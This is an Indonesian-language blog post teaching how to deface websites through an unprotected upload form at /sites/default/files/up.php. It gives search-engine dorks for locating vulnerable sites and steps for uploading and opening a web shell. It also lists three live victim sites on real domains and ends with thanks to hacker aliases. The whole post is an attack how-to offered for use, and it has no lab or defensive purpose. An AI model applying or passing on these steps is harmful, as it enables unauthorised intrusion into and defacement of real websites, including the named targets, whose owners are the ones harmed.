Deface Metode UpDone Check Shell Upload Vulnerability

Deface

Kuy lah jadi hacker B^)
Kali ini tutornya deface method UpDone Check Shell Upload Vulnerability. Gue ga tau asal usul metode ini kok bisa namanya UpDone Check. Yang jelas ini salah satu method yang gue suka :'v
Soalnya exploit yang simpel tetapi mematikan >:(
Kuy lah langsung ae

Dork :
- inurl:/node/ intext:UpDone Check
- intext:UpDone check :/sites/default/files/up.php

Exploit :
- /sites/default/files/up.php

Tutor :

1. Dorking dulu yha. Gue udah ada target :)

2. Kalo udah dapet target langsung gas exploit! Cara exploitnya : site.com/sites/default/files/up.php . Vuln? muncul form upload, aowkoakw simpel kan?

Deface Metode UpDone Check Upload Shell Vulnerability


3. Klik choose file dan pilih shell lu, setelah itu klik Upload. Kalo berhasil muncul tulisan success.


4. Akses shell lu deh :P tempat akses : site.com/sites/default/files/namashellmu.php


Deface Metode UpDone Check Upload Shell Vulnerability

Tinggal gas deh aowkoawk. Simpel banget ea kan.
Kalo mau ngindex backup/rename dulu ya bang :) kasian adminnya anjg bgst :)

Live Target : 
- www.pensionneptuno.com/sites/default/files/up.php
- koks.pro/sites/default/files/up.php
- www.svoeteplo.kiev.ua/sites/default/files/up.php

Thanks to : MichZo - -=P0IS0NERzzID=- - LCR999X - --oo0oo-- - Ryu404 - FreakzSec -./GEMBEL - Mr.L0"Ch0 - RamsNotes31 - [LuCiiFeR] - Mr.BeanCyberID_404 - EquinoX - BL4CK_SKULL_C4P-FnF16 - 0tamega// - ~R3CAPTCHA ID~ - y0sh1 - Mr.L0weRS - Aniki - InurlID - ./Fri4K_4R4nz - /.Mr_Jack154 - XS4BL9 - ~./Khoer - ./Mr.X.Z0NK.X - Xanoi - PheonixTM - MSAttacker - R1z4 - ./Mr. BA645 -./Mr.B3rUk.404 - /Mr.KodoC - Mr. X3R0X - Renym - Anzel4 - Walk3r404z
Previous
Next Post »
Thanks for your comment